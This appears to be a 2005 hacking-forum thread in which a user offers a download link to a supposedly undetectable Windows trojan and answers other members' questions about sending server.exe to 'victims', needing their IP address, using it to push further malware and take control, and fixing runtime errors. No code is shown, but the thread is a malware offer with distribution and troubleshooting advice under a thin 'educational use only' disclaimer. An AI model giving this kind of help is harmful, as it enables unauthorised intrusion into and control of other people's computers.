ganglia
Closed Thread
Page 1 of 3 123 LastLast

Thread: Undetectable Trojan!

carlo Guest

Exclamation Undetectable Trojan!

After Creating a Telnet Trojan I advanced to crateing a normal UNDETECTABLE trojan. This is totaly imune to any av or firewall And you can get it from my sever [URL=http://cookielogger.t*5.com/Trojan.zip]here[/URL].

PLease note that this is for educational use only and do not abuse this ot pass it of as your own.

Thank you

Carlo
    Last edited by carlo; 09-27-2005 at 01:14 PM.

Trojan

Carlo.....wasssa!?

I have a question...do you have to send a file to the "victim"? If so...which one is it??

carlo Guest

yes

yes you must send them th sever.exe

I have a question let say "hypothetically" that you wanted to send this trojan to someones computer, and it definately got there... what exactly would be the prupose? I mean what does a trojan do exactly ? I'm not entirely sure what it does... ... I'm jsut wondering by the way...

Also what are the implications of using said trojan, it can't infect the sender can it?

And also, what is the worst possible thing you could do to someone who recieved a trojan from you, like damage wise, assuming they recieved it in an e-mail attachment....

carlo Guest

lol

Lol dude just say it, it isnt like where going to judge you. This is a api trojan which only lets you send other files from your computer to his e.g a virus or a trojan hourse. If you sent him a trojan horse through it you can totaly take controll of his computer.

Its not working

Downloaded it and getting an error message that says "Mswinsck.ocx or one of its dependencies is not correctly configured. What can i do?

carlo Guest

runetime

Yeah you dont have the visual basic runetime files. You can download them from microsoft.com.

of course u would have to have their IP address, correct?

carlo Guest

yeah

yeah all trojans have to.

so if you get their IP ady. and send them the Trojen then you can do anything with their files correct?

When I try to download it the page doesnt come up!

if i get the ip of the other how i can send the file exe to him

Client Error

Haay...Look...I sent sever.exe to target computer....and then i run client. But if i send any file to target box...the tell me runtime error "40006" .
    What i must do?

carlo Guest

usualy

usualy this is due to the victims ip address or he is blocking your connection to it.

Carlos

Carlos the telnet zip and the Trojan zip is not functioning, the Trojan opens but he does not function? what to make, it needs another program to function...?

Quote Originally Posted by carlo
    After Creating a Telnet Trojan I advanced to crateing a normal UNDETECTABLE trojan. This is totaly imune to any av or firewall And you can get it from my sever [URL=http://cookielogger.t*5.com/Trojan.zip]here[/URL].

PLease note that this is for educational use only and do not abuse this ot pass it of as your own.

Thank you

Carlo

Closed Thread